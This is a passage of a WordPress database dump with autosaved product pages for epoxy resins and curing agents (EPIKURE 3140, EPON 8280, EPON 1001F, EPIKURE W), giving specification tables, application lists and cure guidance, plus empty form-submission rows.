'', '887-autosave-v1', '', '', '2016-10-28 19:50:35', '2016-10-28 19:50:35', '', 887, 'https://www.miller-stephenson.com/887-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2817, 3, '2016-10-28 20:04:26', '2016-10-28 20:04:26', 'EPIKURE 3140 Polyamides are one of the most popular types of amine curing agents. Benefits include superior corrosion and water resistance, flexibility and toughness, superior adhesion to metal, good impact resistance, noncritical mix ratios and long pot life. Certain modified polyamides can be used to develop higher solids formulations that offer superior performance.\n<p class="Section1"><strong>Application Areas/Suggested Uses: </strong>EPIKURE 3140 Curing agent is used in adhesive applications, as well as in primer, midcoat and topcoat formulations for ships, bridges, industrial equipment, hopper cars, tank trucks, automotive refinishes and industrial flooring. They are also used in putties, sealants and electrical encapsulation.</p>\n\n<ul>\n 	<li>\n<div class="Section1">Metal and plastic adhesives</div></li>\n 	<li>\n<div class="Section1">Highway and bridge deck repairs</div></li>\n 	<li>\n<div class="Section1">Potting, casting, and encapsulation</div></li>\n 	<li>\n<div class="Section1">Synthetic flooring systems</div></li>\n 	<li>\n<div class="Section1">Maintenance coatings</div></li>\n 	<li>\n<div class="Section1">Tank and pipe linings</div></li>\n</ul>\n<strong>Benefits</strong>\n<ul>\n 	<li>\n<div>Good chemical and corrosion resistance</div></li>\n 	<li>\n<div>Good water resistance</div></li>\n 	<li>\n<div>Good pigment and substrate wetting</div></li>\n 	<li>\n<div>Good adhesion</div></li>\n</ul>\n<strong>Specifications</strong>\n<table style="height: 228px;" border="1" width="641" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Amine value</td>\n<td valign="top" width="72">\n<p align="center">mg/g</p>\n</td>\n<td valign="top" width="132">\n<p align="center">360-390</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D2896</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity @ 40°C</td>\n<td valign="top" width="72">\n<p align="center">cP</p>\n</td>\n<td valign="top" width="132">\n<p align="center">3,000-4,000</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D2196</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Color</td>\n<td valign="top" width="72">\n<p align="center">Gardner</p>\n</td>\n<td valign="top" width="132">\n<p align="center">9</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1544</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211"></td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132"></td>\n<td valign="top" width="175"></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<strong>Typical Properties</strong>\n<table style="height: 380px;" border="1" width="646" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Flash point</td>\n<td valign="top" width="72">\n<p align="center">°C</p>\n</td>\n<td valign="top" width="132">\n<p align="center">&gt;110</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D3278</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Density @ 25 °C</td>\n<td valign="top" width="72">\n<p align="center">lbs/gal</p>\n</td>\n<td valign="top" width="132">\n<p align="center">8.1</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity @ 25 °C</td>\n<td valign="top" width="72">\n<p align="center">P</p>\n</td>\n<td valign="top" width="132">\n<p align="center">130</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">Appearance</td>\n<td valign="top" width="72"></td>\n<td colspan="2" valign="top" width="307">Clear and free of foreign particles</td>\n</tr>\n<tr>\n<td valign="top" width="211">Equivalent weight</td>\n<td valign="top" width="72">\n<p align="center">approx</p>\n</td>\n<td valign="top" width="132">\n<p align="center">95</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">Mix ratio</td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132"></td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">EEW 190 epoxy</td>\n<td valign="top" width="72">\n<p align="center">phr</p>\n</td>\n<td valign="top" width="132">\n<p align="center">50</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211"></td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132"></td>\n<td valign="top" width="175"></td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<p class="Section2"><strong>Safety, Storage &amp; Handling</strong></p>\n<p class="Section2">Please refer to the MSDS for the most current Safety and Handling information.</p>\n<p class="Section2"> Exposure to these materials should be minimized and avoided, if feasible, through the observance of proper precautions, use of appropriate engineering controls and proper personal protective clothing and equipment, and adherence to proper handling procedures. <b>None of these materials should be used, stored, or transported until the handling precautions and recommendations as stated in the Material Safety Data Sheet (MSDS) for these and all other products being used are understood by all persons who will work with them.</b><a href="https://www.miller-stephenson.com/tech-support/"> Questions and requests for information on Hexion Inc. ("Hexion") products should be directed to your Miller-Stephenson sales representative, </a></p>', 'EPIKURE™ 3140', 'EPIKURE Curing Agent 3140 is a low viscosity reactive polyamide, high imidazoline, moderate molecular weight epoxy curing agent based on dimerized fatty acid and polyamines. Epoxy resin compatibility and thin film curves are very good. Benefits include:\n<ul>\n 	<li>Good chemical and corrosion resistance</li>\n 	<li>Good water resistance</li>\n 	<li>Good pigment and substrate wetting</li>\n 	<li>Good adhesion</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1868-autosave-v1', '', '', '2016-10-28 20:04:26', '2016-10-28 20:04:26', '', 1868, 'https://www.miller-stephenson.com/1868-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2818, 0, '2016-10-31 02:58:39', '2016-10-31 02:58:39', '', '', '', 'publish', 'closed', 'closed', '', '2818', '', '', '2016-10-31 02:58:39', '2016-10-31 02:58:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/2818/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2819, 128, '2016-10-31 07:37:37', '2016-10-31 07:37:37', '', '', '', 'publish', 'closed', 'closed', '', '2819', '', '', '2016-10-31 07:37:37', '2016-10-31 07:37:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/2819/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2820, 0, '2016-10-31 11:11:53', '2016-10-31 11:11:53', '', '', '', 'publish', 'closed', 'closed', '', '2820', '', '', '2016-10-31 11:11:53', '2016-10-31 11:11:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/2820/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2821, 0, '2016-10-31 12:23:48', '2016-10-31 12:23:48', '', '', '', 'publish', 'closed', 'closed', '', '2821', '', '', '2016-10-31 12:23:49', '2016-10-31 12:23:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/2821/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2822, 0, '2016-10-31 12:37:46', '2016-10-31 12:37:46', '', '', '', 'publish', 'closed', 'closed', '', '2822', '', '', '2016-10-31 12:37:46', '2016-10-31 12:37:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2822/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2823, 3, '2016-10-31 12:46:24', '2016-10-31 12:46:24', 'EPON 8280 has been designed especially for formulating filled compounds for a wide variety of structural applications, including bonding, electrical encapsulating, tooling, flooring and most construction uses. EPON Resin 8280 is a low molecular weight resin with outstanding resistance to pigment and filler settling, which gives greater stability to filled systems. The resin also has superior resistance to foaming under vacuum and has an adjusted, controlled reactivity with amine curing agents, which serves to extend pot Iife and working life characteristics. In addition, viscosity stability — often a problem in anti-settling resins — presents no problem for EPON Resin 8280. It is as good in viscosity stability as other conventional liquid EPON Resins. Furthermore, it yields products with high physical strength, excellent chemical resistance and good electrical properties. Typical properties for several EPON 8280 amine-cured systems are given below.\n<p class="Section1"><strong>Application Areas/Suggested Uses</strong></p>\n\n<div class="Section1">\n<ul>\n 	<li>Adhesives</li>\n 	<li>Electrical encapsulation</li>\n 	<li>High solids coatings</li>\n 	<li>Vacuum processing</li>\n</ul>\n</div>\n&nbsp;\n\n<strong>Benefits</strong>\n<ul>\n 	<li>Low foaming</li>\n 	<li>High resistance to filler settling</li>\n 	<li>Controlled reactivity with amine curing agents</li>\n</ul>\n&nbsp;\n\n<strong>Sales Specification</strong>\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Weight per Epoxide</td>\n<td valign="top" width="72">\n<p align="center">g/eq</p>\n</td>\n<td valign="top" width="132">\n<p align="center">185 – 195</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1652</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity at 25°C</td>\n<td valign="top" width="72">\n<p align="center">P</p>\n</td>\n<td valign="top" width="132">\n<p align="center">110 – 150</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D445</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Color</td>\n<td valign="top" width="72">\n<p align="center">Gardner</p>\n</td>\n<td valign="top" width="132">\n<p align="center">1 max.</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1544</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">&nbsp;</td>\n<td valign="top" width="72">\n<p align="center"></p>\n</td>\n<td valign="top" width="132">\n<p align="center"></p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<strong>Typical Properties</strong>\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Specific gravity @ 20°C</td>\n<td valign="top" width="72">\n<p align="center">g/ml</p>\n</td>\n<td valign="top" width="132">\n<p align="center">1.168</p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Density at 20°C</td>\n<td valign="top" width="72">\n<p align="center">lb/gal</p>\n</td>\n<td valign="top" width="132">\n<p align="center">9.7</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1475</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Refractive index @ 25°C</td>\n<td valign="top" width="72">\n<p align="center"></p>\n</td>\n<td valign="top" width="132">\n<p align="center">1.570-1.575</p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n<div class="Section2">\n\nPro<strong>cessing/How to use</strong>\n\n<span style="text-decoration: underline;">Low Foaming Tendencies</span>\n\nEPON Resin 8280 possesses the ability to inhibit foaming during out-gassing in vacuum processing applications. It also has a tendency to reduce bubbles and voids at ambient pressures.\n\n<span style="text-decoration: underline;">Controlled Reactivity with Amine Curing Agents</span>\n\nThe reactivity of EPON 8280 is controlled to provide more uniform reactivity between lots and greater ease of handling to the user. The reactivity is similar to undiluted resins,\n\ne.g., EPON Resin 828.\n\n<span style="text-decoration: underline;">Resistance to Filler Settling</span>\n\n</div>\n<div class="Section2">\n\nWhen compared to standard liquid epoxy resins, EPON Resin 8280 exhibits improved resistance to silica filler settling. This is illustrated in Figure 1, which reflects testing of EPON Resin 8280 and two other systems under three different conditions — 3 hours at 95 °C; 10 hours at 95 °C; and 72 hours at 60 °C. All three systems were prepared using finely divided silica. The curves in Figure 1 plot the depth of the settled layer excluding zero settling. The greater the curvature of the line, the softer the settling layer, and therefore, the more easily redispersed.\n\nIn the 3 hour test, EPON Resin 8280 showed virtually no settling, where the other two systems exhibited a small but hard layer of filler settling. In the 10 hour test, the EPON Resin 8280 system showed a shallow layer of soft settle, while the other two produced deeper and harder layers. In the most severe test, 72 hours, the EPON Resin 8280 system still exhibited a shallow layer of soft settling while the other two systems showed the same or a greater degree of disparity.\n\nSettling tendency was also tested for seven days at 25 °C (not shown in Figure 1). In this test, EPON Resin 8280 exhibited a negligible amount of soft settling, whereas with other systems tested, about half the filler content had settled in a hard layer.\n\n</div>', 'EPON™ 8280', 'EPON™ Resin 8280 has been designed especially for formulating filled compounds for a wide variety of structural applications, including bonding, electrical encapsulating, tooling, flooring and most construction uses. EPON Resin 8280 is a low molecular weight resin with outstanding resistance to pigment and filler settling, which gives greater stability to filled systems. The resin also has superior resistance to foaming under vacuum and has an adjusted, controlled reactivity with amine curing agents, which serves to extend pot Iife and working life characteristics. In addition, viscosity stability —often a problem in anti-settling resins — presents no problem for EPON Resin 8280. It is as good in viscosity stability as other conventional liquid EPON Resins. Furthermore, it yields products with high physical strength, excellent chemical resistance and good electrical properties. Typical properties for several EPON Resin 8280 amine-cured systems are given below. Benefits include:\n<ul>\n 	<li>Low foaming</li>\n 	<li>High resistance to filler settling</li>\n 	<li>Controlled reactivity with amine curing agents</li>\n</ul>', 'inherit', 'closed', 'closed', '', '891-autosave-v1', '', '', '2016-10-31 12:46:24', '2016-10-31 12:46:24', '', 891, 'https://www.miller-stephenson.com/891-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2824, 3, '2016-10-31 15:28:22', '2016-10-31 15:28:22', '<p class="Section1">EPON 1001F is a low molecular weight solid epoxy resin derived from a liquid epoxy resin and bisphenol-A. Because of these performance properties, amine and polyamide cured coatings are especially <span class="GramE">useful</span> in maintenance and marine applications.. EPON Resin 1001F is used for its application or end-use advantages in both structural and surface-coating applications as follows:</p>\n<p class="Section1"><span style="text-decoration: underline;"><strong>Structural applications</strong></span></p>\n<p class="Section1">Because of the excellent pre-impregnation properties, EPON 1001F is used in:</p>\n<p class="Section1">• Dry lay-up laminates</p>\n<p class="Section1">• Dry filament winding</p>\n<p class="Section1">• Transfer molding compounds</p>\n<p class="Section1"><span style="text-decoration: underline;"><strong>Surface coatings</strong></span></p>\n<p class="Section1">Amine or polyamide cured coatings based on EPON Resin 1001F provide excellent:</p>\n<p class="Section1">• Chemical resistance</p>\n<p class="Section1">• Durability</p>\n<p class="Section1">• Toughness</p>\n<p class="Section1">• Adhesion</p>\n<p class="Section1"><strong>Thermosetting acrylic — EPON Resin systems</strong></p>\n<p class="Section1">EPON Resin 1001F is used to upgrade thermosetting acrylic resins into coatings with greatly</p>\n<p class="Section1"><span class="GramE">improved</span>:</p>\n<p class="Section1">• Adhesion</p>\n<p class="Section1">• Toughness</p>\n<p class="Section1">• Detergent resistance</p>\n<p class="Section1">Because of these specific properties, these systems are used extensively for automotive <span class="GramE">and</span> appliance primers. Since solutions of this versatile epoxy resin are the preferred products for most of the aforementioned applications, Miller-Stephenson provides solutions of EPON 1001F in several solvents to assist customers in handling this product.</p>\n<p class="Section1"><span style="text-decoration: underline;"><strong>Specifications</strong></span></p>\n\n<div class="Section1">\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Weight per Epoxide</td>\n<td valign="top" width="72">\n<p align="center">g/eq</p>\n</td>\n<td valign="top" width="132">\n<p align="center">525-550</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1652</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity at 25°C</td>\n<td valign="top" width="72">\n<p align="center">cP</p>\n</td>\n<td valign="top" width="132">\n<p align="center">7.0-9.6</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D445</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Color</td>\n<td valign="top" width="72">\n<p align="center">Pt-Co</p>\n</td>\n<td valign="top" width="132">\n<p align="center">200</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1209</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211"></td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132"></td>\n<td valign="top" width="175"></td>\n</tr>\n</tbody>\n</table>\n</div>\n<p class="Section1"><strong>Typical Properties</strong></p>\n\n<div class="Section1">\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity, Melt, @ 150 °C</td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132">\n<p align="center">600-750</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D445-79</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Esterification equivalent weight<sup>1</sup></td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132">\n<p align="center">145</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">Weight per gallon @ 68 °F</td>\n<td valign="top" width="72">\n<p align="center">lbs</p>\n</td>\n<td valign="top" width="132">\n<p align="center">10.2</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">Flash Point, Setaflash</td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132">\n<p align="center">&gt;200 °F</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D3278</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Bulk density</td>\n<td valign="top" width="72">\n<p align="center">lbs/ft<sup>3</sup></p>\n</td>\n<td valign="top" width="132">\n<p align="center">36-40</p>\n</td>\n<td valign="top" width="175"></td>\n</tr>\n<tr>\n<td valign="top" width="211">Melting Point</td>\n<td valign="top" width="72">\n<p align="center">°C</p>\n</td>\n<td valign="top" width="132">\n<p align="center">75-80</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D3461</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Hydroxyl content</td>\n<td valign="top" width="72"></td>\n<td valign="top" width="132">\n<p align="center">0.29</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Calculated value</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Sodium content</td>\n<td valign="top" width="72">\n<p align="center">ppm</p>\n</td>\n<td valign="top" width="132">\n<p align="center">0-2</p>\n</td>\n<td valign="top" width="175">\n<p align="center">HC-692A</p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<span style="text-decoration: underline;"><strong>Identification and Classification</strong></span>\n\n<strong>Chemical Abstract Service Registry Number:</strong> 25036-25-3 (EPA/TSCA inventory designation)\n\n<strong>MSDS Number:</strong> 184-04\n\n<strong>Chemical Designations:</strong>\n\n• 2.2-<span class="GramE">bis(</span>p-glycidyloxyphenyl) propane condensation product with 2.2-bis(p-hydroxyphenyl)\n\n<span class="GramE">propane</span> and similar isomers.\n\n• Phenol. 4.4’-(1-methylethylidene<span class="GramE">)bis</span>-polymer with 2.2’-[(1-methylethylidene)bis-(4.1-\n\n<span class="GramE">phenyleneoxymethylene</span>)]bis(oxirane).\n\n<strong>Structural formula, base resin:</strong>\n\n<img title="EPON 1001F Structure" src="https://www.hexion.com/uploadedImages/Technical_Data_Sheets/Public/Epoxy_Intermediates/EPON%20Resin%201001F%20structure.JPG" alt="EPON 1001F Structure" border="0" />\n\n&nbsp;\n\nMiller-Stephenson is an Epon 1001F Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>\n\n</div>', 'EPON™ 1001F', 'EPON™ Resin 1001F is a low molecular weight solid epoxy resin derived from a liquid epoxy resin and\nbisphenol-A. EPON Resin 1001F is used for its application or end-use advantages in both structural and\nsurface-coating applications as follows:\n<ul>\n 	<li><strong>Structural applications</strong>: Excellent pre-impregnation properties</li>\n 	<li><strong>Surface coatings</strong>: Toughness, Chemical Resistance, and Durability</li>\n 	<li><strong>Thermosetting acrylic</strong>: Adhesion, Toughness, Detergent Resistance</li>\n</ul>', 'inherit', 'closed', 'closed', '', '924-autosave-v1', '', '', '2016-10-31 15:28:22', '2016-10-31 15:28:22', '', 924, 'https://www.miller-stephenson.com/924-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2825, 130, '2016-10-31 17:24:31', '2016-10-31 17:24:31', '', '', '', 'publish', 'closed', 'closed', '', '2825', '', '', '2016-10-31 17:24:31', '2016-10-31 17:24:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/2825/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2826, 2, '2016-10-31 18:34:06', '2016-10-31 18:34:06', '', '', '', 'publish', 'closed', 'closed', '', '2826', '', '', '2016-10-31 18:34:06', '2016-10-31 18:34:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/2826/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2827, 131, '2016-10-31 19:46:46', '2016-10-31 19:46:46', '', '', '', 'publish', 'closed', 'closed', '', '2827', '', '', '2016-10-31 19:46:46', '2016-10-31 19:46:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2827/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2829, 133, '2016-11-01 13:10:35', '2016-11-01 13:10:35', '', '', '', 'publish', 'closed', 'closed', '', '2829', '', '', '2016-11-01 13:10:35', '2016-11-01 13:10:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/2829/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2831, 0, '2016-11-01 14:04:06', '2016-11-01 14:04:06', '', '', '', 'publish', 'closed', 'closed', '', '2831', '', '', '2016-11-01 14:04:06', '2016-11-01 14:04:06', '', 0, 'https://www.miller-stephenson.com/nf_sub/2831/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2832, 0, '2016-11-01 15:10:58', '2016-11-01 15:10:58', '', '', '', 'publish', 'closed', 'closed', '', '2832', '', '', '2016-11-01 15:10:58', '2016-11-01 15:10:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/2832/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2833, 0, '2016-11-01 15:23:10', '2016-11-01 15:23:10', '', '', '', 'publish', 'closed', 'closed', '', '2833', '', '', '2016-11-01 15:23:10', '2016-11-01 15:23:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/2833/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2834, 67, '2016-11-01 17:37:40', '2016-11-01 17:37:40', '', '', '', 'publish', 'closed', 'closed', '', '2834', '', '', '2016-11-01 17:37:40', '2016-11-01 17:37:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/2834/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2835, 0, '2016-11-01 18:34:19', '2016-11-01 18:34:19', '', '', '', 'publish', 'closed', 'closed', '', '2835', '', '', '2016-11-01 18:34:19', '2016-11-01 18:34:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/2835/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2836, 0, '2016-11-01 19:41:58', '2016-11-01 19:41:58', '', '', '', 'publish', 'closed', 'closed', '', '2836', '', '', '2016-11-01 19:41:58', '2016-11-01 19:41:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/2836/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2837, 3, '2016-11-23 19:46:02', '2016-11-23 19:46:02', 'The EPIKOTE™ Resin 862/ EPIKURE W Curing Agent system consists of a bisphenol-F epoxy resin and an aromatic amine for fabricating composite parts using resin transfer molding (RTM) or filament winding. EPIKURE Curing Agent W does not contain methylene dianiline (MDA). Low viscosity and very long working life at room temperature\nmake this system versatile and easy to process. EPIKURE Curing Agent 537 may be utilized to decrease the gel time of the system with little or no effect on mechanical properties.\n\n<strong>Composite fabrication- Resin Transfer Molding RTM</strong>\n\nThe low viscosity feature of the EPIKOTE Resin 862 / EPIKURE W Curing Agent  resin system permits low injection pressures, less fiber washout, high filler/fiber loading, and lower mold costs for RTM fabrication processes. An ambient temperature, one-pot, RTM process may be employed in which the mixed resin/curing agent increases from 2200 cP initially to 5000 cP after about 36 hours. Alternatively, a two-pot resin and curing  agent system can be used in which either the resin or both pots may be heated, generally less then 60 °C (140 °F) unless otherwise required. A typical process includes injecting into a heated mold at 121 °C (250 °F). The system viscosity at this temperature is on the order of 10 cP. Following the resin injection, the system should be cured in the mold for between 0.5-1.5 hours at 177 °C (350 °F) followed by a 177 °C (350 °F) post-cure for another hour. Molding and postcure temperatures and times can be modified for optimum production.\n\n<strong>Composite fabrication — filament winding</strong>\n\nThe low viscosity and long room temperature pot life of the EPIKOTE Resin 862 / EPIKURE W Curing Agent resin system make it suitable for use in wet filament winding applications.The material may be used at room temperature or heated to reduce viscosity and facilitate fiber wetout. The initial mixed system viscosity of 2200 cP may be reduced to approximately 1000 cP by heating the system to about 40 °C (100 °F). The pot life at this temperature is in excess of 8 hours, sufficient for winding large or complex parts. EPIKOTE Resin 862/EPIKURE Curing Agent W is suitable for use with glass, carbon, and aramid reinforcements. If air entrainment during mixing or fiber impregnation proves to be a problem, air release agents, such as BYK™ A-501* or equivalent, may be added. Cure may be conducted through internal heat sources in the mandrel or externally with ovens or both. Additional resin/reinforcement compaction may be accomplished during cure using traditional vacuum and pressure techniques. Frequently, a staged cure is most desirable in order to minimize resin runout and void formation in the composite. If\nshrinkwrap, vacuum bagging, or other external containment is not utilized, it is recommended that the part be rotated during cure to ensure uniform resin distribution through the part. A suggested cure cycle would include 1 hour at 121 °C (250 °F) plus 2.5 hours at 177 °C (350 °F).\n\n&nbsp;\n\nMiller-Stephenson is an Epikure W and EPON Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPIKURE™ W', 'The EPIKOTE™ Resin 862/EPIKURE™ Curing Agent W system consists of a bisphenol-F epoxy resin and an aromatic amine for fabricating composite parts using resin transfer molding (RTM) or filament winding. EPIKURE Curing Agent W does not contain methylene dianiline (MDA). Low viscosity and very long working life at room temperature\nmake this system versatile and easy to process. EPIKURE Curing Agent 537 may be utilized to decrease the gel time of the system with little or no effect on mechanical properties. Benefits include:\n<ul>\n 	<li>Low room temperature viscosity (about 2200 cP)</li>\n 	<li>Long working life (&gt;20 hrs.)</li>\n 	<li>Low moisture absorption (2-2.5 wt%)</li>\n 	<li>Good epoxy performance characteristics</li>\n 	<li>Non-MDA aromatic amine</li>\n 	<li>High elongation</li>\n</ul>', 'inherit', 'closed', 'closed', '', '1059-autosave-v1', '', '', '2016-11-23 19:46:02', '2016-11-23 19:46:02', '', 1059, 'https://www.miller-stephenson.com/1059-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2838, 135, '2016-11-01 23:17:27', '2016-11-01 23:17:27', '', '', '', 'publish', 'closed', 'closed', '', '2838', '', '', '2016-11-01 23:17:27', '2016-11-01 23:17:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/2838/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2839, 137, '2016-11-02 17:48:09', '2016-11-02 17:48:09', '', '', '', 'publish', 'closed', 'closed', '', '2839', '', '', '2016-11-02 17:48:09', '2016-11-02 17:48:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/2839/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2840, 138, '2016-11-02 18:15:43', '2016-11-02 18:15:43', '', '', '', 'publish', 'closed', 'closed', '', '2840', '', '', '2016-11-02 18:15:43', '2016-11-02 18:15:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/2840/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2841, 139, '2016-11-02 20:39:21', '2016-11-02 20:39:21', '', '', '', 'publish', 'closed', 'closed', '', '2841', '', '', '2016-11-02 20:39:21', '2016-11-02 20:39:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/2841/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2842, 0, '2016-11-03 14:39:17', '2016-11-03 14:39:17', '', '', '', 'publish', 'closed', 'closed', '', '2842', '', '', '2016-11-03 14:39:17', '2016-11-03 14:39:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/2842/', 0, 'nf_sub', '', 0); 
